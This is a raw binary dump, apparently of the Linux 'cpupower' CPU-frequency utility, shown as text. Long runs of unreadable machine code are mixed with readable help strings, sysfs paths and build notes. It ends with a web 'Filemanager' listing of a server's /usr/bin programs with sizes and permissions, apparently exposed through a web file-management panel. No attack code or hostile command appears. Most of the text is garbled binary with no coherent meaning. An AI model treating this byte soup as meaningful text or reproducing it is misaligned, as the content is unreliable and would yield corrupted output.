�����I9�u,�H�5�61��]����H��1��~������������=�tdI��@Bv�@BD��1��H�5�6�щ��1I������I������D��1��H�5�6�щ¿1������
I��@BvN�'L��1�H��H���vI��'�@BL��1Ҿ'H���1���@B1҉�D��H�5D6���I����v@��L��1�H��H���vI�����D��1ҿ��H�5�5��1��a����jI���vK�dL��1�H��H��1vI��d��L��1ҾdH���1����1҉�D��H�5�5�����L��H�5�5�1�����
�{����L��H�5pA�1��Ӥ��1�H��[A\�U�s���H��u)�H�5`51��{����H��1�蜤������#H��H�ſ1�H�5e5�|���H��蔡��1�]Ã=ٓu��tP�5ߓ�~���1�Z�1��AWAVAUATU��SH��dH�%(H�D$x����ȃ��31�H�|$(��D$ �H�T$H�L$ ��H�t$H�\$(脺�����t$1�H�5�4衠����H��1�����r1�H�5�4�}����H��1�螣���|$�H�5�4uH�5�41��M���1��H�5�4I���7���L��H��1��U����|$�H�5�4uH�5�41������H�5�41�I�����L��H��1������v���u�{����=a�w�������t$ H�L$$H�ډ��F������yD�d$ �1�1�H�5'4L�-s4�q���D��H��1�菢��D�d$$�1�H�54�G���D��H��1��e���A��9l$$�L�4�M��tJD�|$ �E9�~H�5�31�����L��D��H���L��1����D��L��H��D)��1�����H���H�y�����
�*�L$� u�/7�T$���7�����H���t,H�5�31���}����*��YD$�H�ư蔡��H��H���Ł�t,H�5�31���@����*��YD$�H�ư�W������t,H�5|31�������*��YD$�H�ư�#�������1��H�5d3�ԝ���*��YD$�H�ư�������H��H�����H�5K31�蒝���H�R3H��1�謠��H�}�5)�H�}t�U���H�޿1�臠��H�m���;����
����H�D$xdH+%(u)H�ĈH��[]A\A]A^A_�y���H�D$xdH+%(t�$���H�Ĉ[]A\A]A^A_���AWAVL�5�}AUI��ATE1�U1�S��H��HdH�%(H�D$81�E1�L��H��2L����؜����zi��`����"�?��?���K�H��H����Fu��nt$��mu.�������E����A������{���H�5��H�=�(��������ou�o���H�5�1��tAH�=���S����t�5��H�=v�������?t:��otC�����H�5�11�軛���H��1��ܞ������P�H�5F(�ҺH�521�聛��L�-T2�H��2H��1�蔞��H�54L���D$ �ݞ��W�H��)$H��uu�)�����8轠���H�521�I������L��L��H��1��2����H�������ulH��
L���Q���H��t�L���D$7�ߚ��H��wL�d$.��H��L��觠��H��u�H�T$ H�5�1L���n�����u�($fnD$ f8?�)$�H���M���(3f�$f~�E1�E1�L�=�1E1�A9���D��輚��H��H��t|H�T$ H�t$D���2�����tH�D$ �HkEdH�L$ 1�H��1�I��HkEdH��I��E1�H�|$ L�M�uD��H�MEE�D��AEƿL��P1�����XH��Z舞��A���c���H�=I������H�=;��/���9��'H�='����������
1��H�5�0�u����ڿH��1�蔜�����h�����t1�1�H�5�&�F����H��1��g����
�����E�����H�51Hc�H�>����������_������8������������������m���o���I��H��tj�H�5!01�褘���L�=d.H��1�辛��I�~�5;�I�>t�h���L���1�蚛��M�v���N����
����L��譗�����/����������y����R���������������������D��v������j�����^���@����RD����q��CD����<��4D�������%��L�=;/�Y���H�t$ ��I���z���I��M����I�UE��tz�5'�H���V���I�EH��x�H*��H�ƒ�H��H	��H*��X�H�D$ �Y#H��x�H*��H�ƒ�H��H	��H*��X��^�H�5�.���-����I�ML���1�����M�mM��u$1�訛��M��tUL��H�5o.�1�����=H�5�,�1��ؙ������D����������P��������b��u,������1��!H�=�����G����e�W������O���H�T$8dH+%(t�]���H��H[]A\A]A^A_�AWAVAUATUH��SH��XdH�%(H�D$H1��}0uH����
���I��1�H�I�uH��Dqt<.u��t1��q�I����@��.t�1�@��tb1�1�L�%EeI�4$H��tJE1�O�t=H�t$E���#�T$H�L$臛��H�t$H�L$H��T$B�<>I��B;<�t�I����u�1�H�|��H���Dyu�Hc�@��.u�…�xH�tH���Dqt	�����|����T1ۅ��2���D�A���$���1��}.uH�ŊML�d$(H�ňL(H��9��1�Hc�A9Љ�HL�L�0H���1�A9�L؍D�H�@�l(�D(蜓��H�t$ �
L���H������;�����@��4~H����€�H���A�\$�����H�T$HdH+%(t�q���H��X[]A\A]A^A_�P�H�5� 1��.����ZH��1��N�����AWL�=AwAVI��AUE1�ATE1�U1�S1�H��h�|$dH�%(H�D$X1�H�D$(H�D$0H�D$8�|$E1�L��L��H�U,�����f����?tP��dt(�����ȃ�rt��utA��gtx�A��A��A���H�|$(tA��H�=�y���,���H�D$(H��u��	�����H�|$0tA��H�=dy�����H�D$0��H�=OyH��A�����H��H���H�|$8tA��H�=(y��H�|$���H��H��w�H�|$H�T$D1�H�5y+H�T$蕕�����m���H�T$H�T$8���E��tH�=Q+�ݑ���@H��t�H�5f+��uH��u1��u-�H�5�+1��j����H��1�苕��A����1H�=ل蠹����tH�=Ʉ�C���E��u 輰��H�=��L�=�+���A���H�=���Թ��A��H�=���}���A9�w�H�=x�D���`�����tED���t�����u9D�����I��H��t�I�~A�6H�=A�t褸��M�v��虸��L��跕��A���H�=�D��������uA��H�=����A9�v��BD�������u�1��L���K���D��H��1��i�����t��t�OH��D���c����H�t$(H��tD���O���A���H�t$0H��t
D��腕����H�t$8H��t
D���q�����D���G���I��H��u*�H�5o*1�A���趐���H��1��ד���ZH�|$(uH�H�D$(H�|$0u	I�@H�D$0H�|$8u	I�@H�D$8D��H�t$(L�D$�A���H�|$A������E�������H�5
*1�E���5����H��1��V��������H�D$XdH+%(t�*���H��hD��[]A\A]A^A_�PX�H�5�1�P����H��1�������ٔ����AWAVI��AUATUSH����|$H�|$dH�%(H��$�1��@�����u_H��$H�5�*A��H���B�����tH�5�*H���/�����u.1��H�5�*�H���H�=�u�H��1��R�����H�5�0�1�1��8���H�=�A�L�=�r诎���|$E1�L��L��H��*����A�ă���	A��m��A��btA��etZ�KA��t���?��u:H�=�t�����Ń�v,�H�5A*1�艎����H��1�襑���x������i�����u�H�=�t1�H��$�H�5#*������u̓��;����=Ӏu���u�H�=Ut1�H��$�H�5�&�ߐ����u���������u�H�='t�b���A�Ń�vH�=�)�����d������������T���A�ހ�t'H��$�莪��A�ą�tH�5�sH�=�)�j���A��t"D���%���A�ą�tH�5�sH�=�)�B���H�=��´����tH�=��e���H�=�H��)����A��H�=�轴��A9���H�=�D��蜴������D��������tSH��1�����H�=BsD��H��1�����1��H�5�͌��H�=s�H��1��ב���nA��t,��D�����A�ą�t�H�5�(1�苌��D��H���'A��t6H��$�D���|���A�ą�tD��H��(H�=�r�1��i����A�����H��$�dH+%(t�G���H���D��[]A\A]A^A_�PX�H�5�1�P����H��1����������AVAUI��ATU��S1�H��dH�%(H��$�1�H�|$�\�����u_L��$H�5'A��L���^�����tH�5
'L���K�����u.1��H�5�&�d���H�=�q�H��1��n����H�5�,�L�5�o�Q���H�=��Պ��E1�L��H��'L����>���A�ă��tA��bu
��u���������݅�u�H�=o}���4�����t�5f}H�=W}輱��@���j�=M}u)1��H�5l'��蚊�����H��1�踍���0�/}u'�H�5t'1����h������H��1�膍��H�=�|H�-�!����A��H�=�|轱��A9���H�=�|D��蜱������1��H������D��H��1��#���D�������t$1��H�5!�ԉ���H��1�����j��teD���F����A�Ņ�y1H�5�&1�蜉��H�=�oD��H��1�裎���艎��H�5�&1��k���D��H��1�艌��A������E1�H��$�dH+%(t�V���H�ĐD��[]A\A]A^���AWAVA�AUL�-�mATI��U1�S��H��E1�L��H�m&L����������tY��ot��suE1��Ճ�?uкH�5q���u�o뷺H�5(&1�衈���H��1��‹���蘍��H�={�د����t�5
{H�=�z�`�����������H�5&I��H��tAH�5&1��7���L��H��1��U���L���͆������I��H��uH�5�%1�����H��1������(H�5�%1��އ���L��H��1����L���t���H�=Mz良����H�=?z�3���9���H�=+z����������1��H�5��y����ڿH��1�蘊�����l�����t'1��H�5��J����H��1��k����?������o�.���Ί���H�5@%A�Ņ���H�5H%1�A����H��1������H�5=%1��ц��A�U��H��1�����H�55%1�諆����5w�H��1��lj���H�51%1�脆���H��1�襉��L�%E9��nL�ƺ1��V���D��D��H��1��q����H�5
%1��.����H��1��O���D����5����H�5�$1�I�����L���H��1�����D���裉���H�5�$1�I���ͅ��L���H��1����D��������H�5�$1�I��蛅��L���H��1�蹈��D���A���L����H�5�$1�I���f���L���H��1�脈�������
����������A�ą�u$H�5_$1��$����ڿH��1��C����H�5S$1�E1����D��L�=p&H��1������H�5?$1��ф���H��1���D����8���H��t!H�D$H�¿L��1��̇��H�|$�B���A�EA9�tA���¿
E1��7���E���wD���贃��D��߉D$�ւ��I��H���A�T$H��!H�
�%�H�5�#��L��HO�1��L���L���Ă��D���誆��I��H�����H�5w#1����L���H��1��	���L��聂��D�������H�5W#1�I��豃��L���H��1��φ��D����U����H�53#1�I������L���H��1�蝆��D���資���H�5#1�I���M���L���H��1��k���D��������H�5�"1�I������L���H��1��9���A�D$E9�tA������
譁�����0���H��1�[]A\A]A^A_���AWL�=�gAVE1�AUI��ATE1�U1�SH��(�|$dH�%(H�D$1��|$E1�L��L��H�f"贂���Ã������E����?����DtX���뽍@���w����H�=shH�t$�
�D���H�D$L�%Xh�8t�H�5�!�GL���}���A��명�ujH�=-hH�t$�
莃��I��H�D$�8t�L�%
h�H�5�!1��ǁ��L��H��1�����軆�����E������?u��H�5�K�H�50�=����H�=t�ɨ����tH�=�s�l���H�=�s�"������;�H�5g"1��:����H��1��[����q���H�=�s��蘨����u��H�=�s菨��9�v����������uމ�蛄��A�Ņ�tЃ�dt&��etZ��D����E�{���E1�L�=t!��D��������H�5� ��t6���tVH�5� ���tfH�5!�1�D���������u'H�5!1��]�����D��H��1��y����0������u	H�5v ��H�51!���u�H�5� 1������H��1��=�����E1�L�= D����D��D��߉D$�����|$u#I9�vY1�D����~���H�5x ��u=� I9�w6�D�����~����u#�L��1������D��H��1�豂��A��E9��w����K1�D����~����u#�L��1��T����D��H��1��p���A��E9�tD����~~����u��E�������{���H�D$dH+%(t�&��H��(1�[]A\A]A^A_���AU��W�ATE1�UH�-S SH��H��dH�%(H��$1�H�|$D$�D9�L�l$~A��
t�H��L��A���|����H��L��H�5�1��螁��H�t$H���Q���A�ą����|$H��H���HD�H�5�1��\�����`t%�H�5�1��~��L��H��1��.�����`t%�H�5�1���}��L��H��1������
�|��H��$dH+%(t��}��H��D��[]A\A]�ATH��H�$H����W��dH�%(H��$1�H�|$L�d$D$�L����}���H�5%��x7�1�L��H�5/�\���H�|$�����xo�|$�uH�51��6H�5$1��|���H��1������u~��H��H��u"�H�5��|���H��1������H�5�����}��H��$dH+%(t�|��H��A\���1����ATL�%IbUH��S��E1�L��H��H����|����?tE��at4��t<�H�5�1��:|��H�=�b�H��1��D�������n��o���1�[]A\���H��H���HW pstates [%d] exceeding max [%d]
  amd-pstate limits:
    Highest Performance: %lu. Maximum Frequency: .    Nominal Performance: %lu. Nominal Frequency:     Lowest Non-linear Performance: %lu. Lowest Non-linear Frequency:     Lowest Performance: %lu. Lowest Frequency:     Preferred Core Support: %lu. Preferred Core Ranking: %lu.
amd_pstate_highest_perfamd_pstate_max_freqamd_pstate_lowest_nonlinear_freqamd_pstate_hw_prefcoreamd_pstate_prefcore_ranking/dev/cpu/%d/msr/sys/devices/system/cpu/cpuidle/%s/sys/devices/system/cpu/cpu%u/sys/devices/system/cpu/cpu%u/online/sys/devices/system/cpu/cpu%u/cpuidle/state%u/%s/sys/devices/system/cpu/cpuidle/sys/devices/system/cpu/cpu%u/cpuidle/state0/sys/devices/system/cpu/cpu%u/cpuidle/state%ddisablecurrent_governorcurrent_governor_rocurrent_driverdescnameusagetime/sys/devices/system/cpu/cpu%u/power/energy_perf_bias/sys/devices/system/cpu/cpu%u/cpufreq/energy_performance_preference/sys/devices/system/cpu/amd_pstate/status/sys/devices/system/cpu/cpufreq/boostamdFollowing CPUs are online:
%s
Following CPUs are offline:
%s
cpupower set operation was not performed on them
%u.%06u GHz%u.%03u MHz%lu kHz%u.%02u GHz%u MHz%u.%01u MHz/proc/cpuinfoprocessor	: processor	: %uvendor_idcpu family	: cpu family	: %umodel		: model		: %ustepping	: stepping	: %uUnknownGenuineIntelAuthenticAMDHygonGenuine%u%c,-,:,%d-%dY@Fam_14hFam_12hMeasure took %u seconds, but registers could overflow at %u seconds, results could be inaccurate
)@NHM-C1C3C6SNB-C7ATM-C2C4�C�invalid or unknown argument
%s||| PKG|CORE| CPU|%4d|******%6.1f%6.2f%6lluMonitor %s, Counter %s has no count function. Implementation error
 *is offline
Monitor "%s" (%d states) - Might overflow after %u s
%s	[%c] -> %s
forkwait%s took %.5f seconds and exited with status %d
+lci:m:Cannot read number of available processors
WARNING: at least one cpu is offlineAvailable monitor %s needs root access
No HW Cstate monitors found
%s: max monitor name length (%d) exceeded
No matching monitor found in %s, try -l option
TCPM��.AUsage:	cpupower [-c|--cpu cpulist ] <command> [<args>]
Supported commands are:
	%s

Not all commands can make use of the -c cpulist option.

Use 'cpupower help <command>' for getting help for above commands.
cpupower-h--help-c--cpuError parsing cpu list
-v--versioncpupower 5.14.0-611.45.1.el9_7.x86_64Report errors and bugs to %s, please.
linux-pm@vger.kernel.orgUnknown option: %s
No valid cpus found.
modprobe msrMSR access not available.
Subcommand %s needs root privileges
frequency-infofrequency-setidle-infoidle-setpowercap-infomonitor  Unable to determine current policy
  current policy: frequency should be within  and .
                  The governor "%s" may decide which speed to use
                  within this range.
Not Available
  hardware limits:  - %lu %lu
  CPUs which need to have their frequency coordinated by software:   CPUs which run at the same hardware frequency:   available cpufreq governors: %s   current CPU frequency: Unable to call hardware%lu (asserted by call to hardware)
 Unable to call to kernel
 (asserted by call to kernel)
  energy performance preference: %s
  maximum transition latency:  Cannot determine or is not supported.
%u.%06u ms%u us%u.%03u us%lu ns%u.%02u ms%u.%01u us  no or unknown cpufreq driver is active on this CPU
  driver: %s
Error while evaluating Boost Capabilities on CPU %d -- are you root?
  boost state support:
yesno    Supported: %s
    Active: %s
    Boost States: %d
    Total States: %d
    Pstate-Pb%d: %luMHz (boost state)
    Pstate-P%d:  %luMHz
    %.0f MHz max turbo 4 active cores
    %.0f MHz max turbo 3 active cores
    %.0f MHz max turbo 2 active cores
    %.0f MHz max turbo 1 active cores
  boost frequency steps: , oefwldpgrasmybnczThe argument passed to this tool can't be combined with passing a --cpu argument
You can't specify more than one --cpu parameter and/or
more than one output-specific argument
          minimum CPU frequency  -  maximum CPU frequency  -  governor
/proc/statCouldn't count the number of CPUs (%s: %s), assuming 1
cpu cpu%d CPU%3d    %9lu kHz (%3d %%)  -  %9lu kHz (%3d %%)  -  %s
analyzing CPU %d:
  available frequency steps:  :%.2f%%%lu:%llu  (%lu)
debughwfreqhwlimitspolicygovernorsrelated-cpusaffected-cpusstatsprochumanno-roundingperformanceepp������I�������*�����b��b��b��b����b��b��b�����b�����9��b��b��b����b��=��R���(\��`@d:u:g:f:r%19sthe same parameter was passed more than oncethe -f/--freq parameter cannot be combined with -d/--min, -u/--max or
-g/--governor parameters
At least one parameter out of -f/--freq, -d/--min, -u/--max, and
-g/--governor must be passed
Setting cpu: %d
wrong, unknown or unhandled CPU?
Error setting new values. Common errors:
- Do you have proper administration rights? (super-user?)
- Is the governor you requested available and modprobed?
- Trying to set an invalid policy?
- Trying to set a specific frequency, but userspace governor is not available,
   for example because of hardware which cannot be set to a specific frequency
   or because the userspace governor isn't loaded?
khzmhzghzthzminmaxrelatedppc64leppc64Subcommand not supported on POWER.
--perf-bias param out of range [0-%d]
%29s--turbo-boost param out of range [0-1]b:e:m:Error setting mode
Error setting turbo-boost
Cannot set values on CPU %d:Error setting perf-bias value on CPU %d
Error setting epp value on CPU %d
perf-biasamd-pstate-modeturbo-boostbIntel's performance bias setting needs root privileges
System does not support Intel's performance bias setting
Could not read perf-bias value[%d]
perf-bias: %d
 (DISABLED) osYou can't specify more than one output-specific argument
Could not determine cpuidle driver
CPUidle driver: %s
Could not determine cpuidle governor
CPUidle governor: %s
CPU %u: No C-states info
active state:            C0
max_cstate:              C%u
maximum allowed latency: %lu usec
states:	
    C%d:                  type[C%d] promotion[--] demotion[--] latency[%03lu] residency[%05lu] usage[%08lu] duration[%020Lu] 
CPU %u: No idle states
Number of idle states: %d
Available idle states:%s%s:
Flags/Description: %s
Latency: %lu
Residency: %lu
Usage: %lu
Duration: %llu
silentd:e:ED:Bad value: %s, Integer expected
Bad latency value: %s
Idlestate %u disabled on CPU %u
Idlestate %u not available on CPU %u
Idlestate disabling not supported by kernel
Idlestate %u not disabled on CPU %u
Idlestate %u enabled on CPU %u
Idlestate enabling not supported by kernel
Idlestate %u not enabled on CPU %u
Invalid or unknown argument
enabledisable-by-latencyenable-allenableddisabled	%sZone: %s (%s)
%sPower can be monitored in micro Jules
%sPower can be monitored in micro Watts
No powercapping driver loaded
Driver: %s
Powercapping is disabled
Powercap domain hierarchy:

No powercap info found
a;��T���\���d��8Th���=i��Pi��(�j��tkk���l����m���n��DAo��p�o����o����p����q��or��<+s����s���Dt���Rt���]t���kt��yt�� �t��4�u����u���0w��	Nw��$	\w��8	fw��L	pw��d	4x���	�x���	�y���	~z��,
={��X
�{���
6|���
�|���
}���}��8��L��h ���-���:�������}���X����t�����߃�������/����~��������
����$
ۄ��8
���L
$���`
-���t
Q����
u����
}����
G����
T���T�hS��������������������<L���P����h?����܍���%������$����8��P��������e�������:��� ��4)���`.���������Ö��$P���8����`P�����������������T����l)����w�������j���8<���\����������������������գ��8`���t�����������H������������P���(ٰ��PG���x��������������a����K����I�����������$%���LӸ��x�����ҹ�������d�������(�����v���b��8���P�������������� ���d��������@�h�|zRx��c��&D$48O��FJw�?:*3$"\W���t!d��H� d���F�B�B �B(�A0�A8�Dpm8D0A(B BBB$�ae���E�I�G0vAA4��e���F�B�F �C(�GPv(A ABB<4$f���F�G�B �K(�E0�(D MDB,t�g���F�N�F �Kp� AAB(�@h���E�K�K��AA��h��YH P$�i��ZE�H�G0CAA(8i���B�M�S��DB(@�i��>F�N�S�AB,l�j���E�V�\�F�[�A�dD@�+k���F�D�I �Q�Y�F�N�D�b AAB(��k���B�I�G�qDB l���B�O�xE0ll��Dfl��X]l��lWl���Ql��P�Hl��,F�I�B �D(�A0�G���N�U�A�a0A(A BBB$� m��OF�D�C ~ABPGm��1F�B�B �D(�C0�I���M�N�D�h0A(A BBBd$n��ER
EA�"n���n��
�n��
(�n���F�G o
HEvD0��n���F�A�A �G�� AAB0$"o���F�A�A �G�� AAB0X�o���F�M�P �L�� ABB(�Jp���F�K�G��AB(��p���F�H�G��AB$�fq��DF�F�A sAB�q��aE�[4(�q��mF�I�A �A
MDEABB4`�q���F�I�A �f
GEGABB�Sr��u��s��E�E��s��
E�G��s��
E�G�s��
E�GLvs��cF�I�B �B(�G0�D8�K�,8D0A(B BBBHl�v���F�B�E �E(�A0�D8�G��8D0A(B BBB�w��!HK M�"w��IF�#w��(MM3w��4Sw��$,[w��OF�A�H |ABT�w�� J�P�p�w����w��(��w��%��w��$��w��	��w��$��w��$��w��H	�w���F�B�B �I(�D0�G8�Dp�8A0A(B BBBT\	Cy��
F�B�E �E(�A0�D8�DP�XR`FXAPR8D0A(B BBB�	�y����	�z��bLI,�	�z���F�T�C �D@� CAB,
P{���F�T�C �D@� CAB(@
�{��HF�A�H �qAB,l
�{���i�M�H �gABA����
k|����
�|��V@I,�
2}���F�T�C �D0u CAB,�
�}���F�H�C �D0� CAB((~��IF�H�H �oAB,T)~���I�M�H �gABA�����~����L��V@I,�����F�T�C �D0u CAB,�����F�H�C �D0� CAB(d���IF�H�H �oAB,<�����l�M�H �gABA���l����(�����(�����HF�A�H �qAB,�����Y�A�A ��ABA���@������F�D�I �H(�H0�DP[0C(A BBBL4
߃��F�R�B �B(�A0�H8�H@�
8C0A(B BBBA�
�����$�
���GE�A�C tDA<�
/����F�D�B �A(�A0�FP�0C(A BBB8����jF�K�B �A(�A0�K(C BBB(<օ���E�R �
AEDAHh����NF�I�B �B(�H0�C8�A@$8A0A(B BBB�����@�����+B�E�E �A(�C0�G�0A(A BBB,q���NY�H�A �!DBA���@����rEh<X���j�B�A �A(�D0E(C ABBA���� �*����E�D0�A,�،���F�A�A �F@� CAB$�j����E�A�F@�CA����/AAO(0����B�A�I��AB\���1$p����!E�C�C SAA8������F�B�B �D(�D0�q(A BBBH���$F�J�I �B(�D0�G8�I��8A0A(B BBBH ����~F�B�B �B(�A0�C8�N�U8A0A(B BBB8l��F�B�A �H(�I��(A ABB8������F�I�A �D(�F`a(C ABB(������M�A�C �|CB`f����F�B�B �E(�A0�H8�J���F�F�F�I�a8A0A(B BBBt���3$� ����E�H�F0sAA$�����nE�H�F0XAA�Ǚ���K� I� �H�Z����F�B�F �B(�A0�A8�DP�8D0A(B BBB(D
����B�O�H ��FE$p�����H�A�A �ABH��K��JF�I�E �B(�E0�H8�K�8D0A(B BBB$�՛���B�A�A �AB$�����B�A�F@�DB$4m����A�A�H �AA$\���A�A�H �AA$�a����A�A�H �AA(�ў���T�A�C �ABA��$�S����B�A�C �AB$ܟ��NA�A�C FAA((���9B�A�F0,ABT���YA�WpL���%SN`�Y���)B�B�B �B(�A0�C8�G��
8D0A(B BBBE\8A0A(B BBB\�����F�B�I �E(�D0�C8�F���[�H�D��8A0A(B BBBHL�����B�B�B �B(�A0�D8�D��8A0A(B BBB�"���$AYH�.���&F�I�E �E(�D0�C8�F��8D0A(B BBB����/AAOH����F�B�E �B(�A0�A8�G��8D0A(B BBBd����/AAO@������F�B�E �A(�C0�I��0D(A BBBL����NF�B�H �I(�D0�C8�FP8C0A(B BBBL����F�I�E �E(�D0�C8�D`�8C0A(B BBB8d����XF�J�D �H(�J�((D ABB$����B�G� I� �B����(�����F�H�D �kAB@UU���(�7�<�A�h��G���K�S�`�m����������	(@
��px���o���
����(0�
	���o���oP���o�o<���o��0@@@P@`@p@�@�@�@�@�@�@�@�@AA A0A@APA`ApA�A�A�A�A�A�A�A�ABB B0B@BPB`BpB�B�B�B�B�B�B�B�BCC C0C@CPC`CpC�C�C�C�C�C�C�C�CDD D0D@DPD`DpD�D�D�D�D�D�D�D�DEE E0E@EPE`EpE�E�E�E�E�E�E�E�EFF F0F@FPF`FpF�F�F�F�F�F�F�F�FGG G0G@GPG`GpG�G�G�G�G�G�G�G�GHHY�q�������Nehalem� v_uw�v���6C3Processor Core C3`tC6Processor Core C6`tPC3Processor Package C3`tPC6Processor Package C6`tSandyBridge�"Ky�x1z�y���6C7Processor Core C7�wPC2Processor Package C2�wPC7Processor Package C7�wHaswellExtended $�|�{q}(}���6PC8Processor Package C8�zPC9Processor Package C9�zPC10Processor Package C10�z�%ǁ:�5�~W!PC0Package in sleep state (PC1 or deeper)F~PC1Processor Package C1F~PC6Processor Package C6F~NBP1North Bridge P1 boolean counter (returns 0 or 1)~Idle_Stats 2\�����\�����Mperf�'H�
�v������6C0Processor Core not idle5�CxProcessor Core in an idle state5�FreqAverage Frequency (including boost) in MHz��@%` @"�#�'`) 'RAPL`8�\�S�փ������������������*������ͽ��*�s�ş_�es�b��fe�wl�l0�du�p|�g��r��a��s�y��o��m��n��c��z�d#�u�g��f'�rS�b��e]�mm�tS�b��s��o��d��e��D
�E�aAV:4p1298RV:running gcc 11.5.0 20240719BV:annobin gcc 11.5.0 20240719GW:0x3d2056a ../sysdeps/x86/abi-note.cSP:3SC:1CF:8 ../sysdeps/x86/abi-note.cFL:-1 ../sysdeps/x86/abi-note.cGA:1PI:3SE:0iS:0GW:0x3d2056a init.cCF:8 init.cFL:-1 init.cGW:0x3d28d6a utils/helpers/amd.cCF:8 utils/helpers/amd.cFL:2PI:4GW:0x3d28d6a utils/helpers/msr.cCF:8 utils/helpers/msr.cGW:0x3d28d6a utils/helpers/sysfs.cCF:8 utils/helpers/sysfs.cGW:0x3d28d6a utils/helpers/misc.cCF:8 utils/helpers/misc.cGW:0x3d28d6a utils/helpers/cpuid.cCF:8 utils/helpers/cpuid.cGW:0x3d28d6a utils/helpers/pci.cCF:8 utils/helpers/pci.cGW:0x3d28d6a utils/helpers/bitmask.cCF:8 utils/helpers/bitmask.cGW:0x3d28d6a utils/idle_monitor/nhm_idle.cCF:8 utils/idle_monitor/nhm_idle.cGW:0x3d28d6a utils/idle_monitor/snb_idle.cCF:8 utils/idle_monitor/snb_idle.cGW:0x3d28d6a utils/idle_monitor/hsw_ext_idle.cCF:8 utils/idle_monitor/hsw_ext_idle.cGW:0x3d28d6a utils/idle_monitor/amd_fam14h_idle.cCF:8 utils/idle_monitor/amd_fam14h_idle.cGW:0x3d28d6a utils/idle_monitor/cpuidle_sysfs.cCF:8 utils/idle_monitor/cpuidle_sysfs.cGW:0x3d28d6a utils/idle_monitor/mperf_monitor.cCF:8 utils/idle_monitor/mperf_monitor.cGW:0x3d28d6a utils/idle_monitor/cpupower-monitor.cCF:8 utils/idle_monitor/cpupower-monitor.cGW:0x3d28d6a utils/idle_monitor/rapl_monitor.cCF:8 utils/idle_monitor/rapl_monitor.cGW:0x3d28d6a utils/cpupower.cCF:8 utils/cpupower.cGW:0x3d28d6a utils/cpufreq-info.cCF:8 utils/cpufreq-info.cGW:0x3d28d6a utils/cpufreq-set.cCF:8 utils/cpufreq-set.cGW:0x3d28d6a utils/cpupower-set.cCF:8 utils/cpupower-set.cGW:0x3d28d6a utils/cpupower-info.cCF:8 utils/cpupower-info.cGW:0x3d28d6a utils/cpuidle-info.cCF:8 utils/cpuidle-info.cGW:0x3d28d6a utils/cpuidle-set.cCF:8 utils/cpuidle-set.cGW:0x3d28d6a utils/powercap-info.cCF:8 utils/powercap-info.cGA$3a1@�TGA$3a1�T��.shstrtab.interp.note.gnu.property.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.sec.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.data.rel.ro.dynamic.got.data.bss.annobin.notes.gnu.build.attributes880&hh$9�� G���o��0Q���Y���a���o<<n���oPP�}00�
�B�(�(��@@� @ @� H H��PP�}�����
�������������pp�xx���  ������8�  � �/�/� 
0�/5p\�6H@7/

Filemanager

Name Type Size Permission Actions
GET File 15.82 KB 0755
HEAD File 15.82 KB 0755
Mail File 1013.25 KB 0755
POST File 15.82 KB 0755
[ File 51.8 KB 0755
ab File 81.46 KB 0755
ac File 32.6 KB 0755
aclocal File 35.52 KB 0755
aclocal-1.16 File 35.52 KB 0755
acpi_listen File 15.47 KB 0755
acyclic File 15.3 KB 0755
addr2line File 27.75 KB 0755
alias File 33 B 0755
animate File 15.1 KB 0755
ansible File 979 B 0755
ansible-config File 993 B 0755
ansible-connection File 1001 B 0755
ansible-console File 995 B 0755
ansible-doc File 987 B 0755
ansible-galaxy File 993 B 0755
ansible-inventory File 999 B 0755
ansible-playbook File 997 B 0755
ansible-pull File 989 B 0755
ansible-vault File 991 B 0755
appstream-compose File 31.47 KB 0755
appstream-util File 116.57 KB 0755
apropos File 48.52 KB 0755
apropos.man-db File 48.52 KB 0755
apxs File 19.35 KB 0755
ar File 55.98 KB 0755
arch File 31.66 KB 0755
arpaname File 15.11 KB 0755
arping File 27.25 KB 0755
as File 710.32 KB 0755
aserver File 39.46 KB 0755
aspell File 151.12 KB 0755
at File 55.49 KB 0755
atq File 55.49 KB 0755
atrm File 55.49 KB 0755
attr File 15.72 KB 0755
audit2allow File 14.71 KB 0755
audit2why File 14.71 KB 0755
aulast File 19.2 KB 0755
aulastlog File 15.13 KB 0755
ausyscall File 15.12 KB 0755
authselect File 43.68 KB 0755
autoconf File 14.42 KB 0755
autoheader File 8.33 KB 0755
autom4te File 31.43 KB 0755
automake File 251.93 KB 0755
automake-1.16 File 251.93 KB 0755
autopoint File 26.36 KB 0755
autoreconf File 20.57 KB 0755
autoscan File 16.72 KB 0755
autoupdate File 33.08 KB 0755
auvirt File 35.3 KB 0755
avinfo File 23.35 KB 0755
awk File 698.17 KB 0755
b2sum File 51.79 KB 0755
base32 File 35.69 KB 0755
base64 File 35.7 KB 0755
basename File 35.67 KB 0755
basenc File 48.02 KB 0755
bash File 1.32 MB 0755
bashbug File 6.91 KB 0755
bashbug-64 File 6.91 KB 0755
batch File 140 B 0755
bc File 89.24 KB 0755
bcomps File 23.37 KB 0755
bg File 30 B 0755
bison File 494.76 KB 0755
blkiomon File 24.48 KB 0755
blkparse File 54.13 KB 0755
blkrawverify File 19.37 KB 0755
blktrace File 49.87 KB 0755
bluemoon File 43.75 KB 0755
bluetoothctl File 585.4 KB 0755
bno_plot.py File 3.46 KB 0755
bond2team File 22.75 KB 0755
bootconfig File 30.29 KB 0755
bootctl File 100.54 KB 0755
brotli File 753.3 KB 0755
bsqldb File 35.47 KB 0755
bsqlodbc File 31.37 KB 0755
btattach File 31.5 KB 0755
btmgmt File 182.06 KB 0755
btmon File 1.07 MB 0755
btrace File 895 B 0755
btrecord File 20.39 KB 0755
btreplay File 28.7 KB 0755
btt File 78.73 KB 0755
bunzip2 File 39.62 KB 0755
busctl File 100.16 KB 0755
bwrap File 72.22 KB 0755
bzcat File 39.62 KB 0755
bzcmp File 2.09 KB 0755
bzdiff File 2.09 KB 0755
bzegrep File 2.01 KB 0755
bzfgrep File 2.01 KB 0755
bzgrep File 2.01 KB 0755
bzip2 File 39.62 KB 0755
bzip2recover File 15.4 KB 0755
bzless File 1.23 KB 0755
bzmore File 1.23 KB 0755
c++ File 1.05 MB 0755
c++filt File 27.19 KB 0755
c89 File 228 B 0755
c99 File 219 B 0755
ca-legacy File 1.61 KB 0755
cal File 51.83 KB 0755
canberra-boot File 19.07 KB 0755
canberra-gtk-play File 19.18 KB 0755
captoinfo File 87.79 KB 0755
cat File 35.66 KB 0755
catchsegv File 3.21 KB 0755
catman File 35.86 KB 0755
cc File 1.04 MB 0755
ccomps File 27.47 KB 0755
cd File 30 B 0755
centrino-decode File 14.13 KB 0755
certutil File 172.57 KB 0755
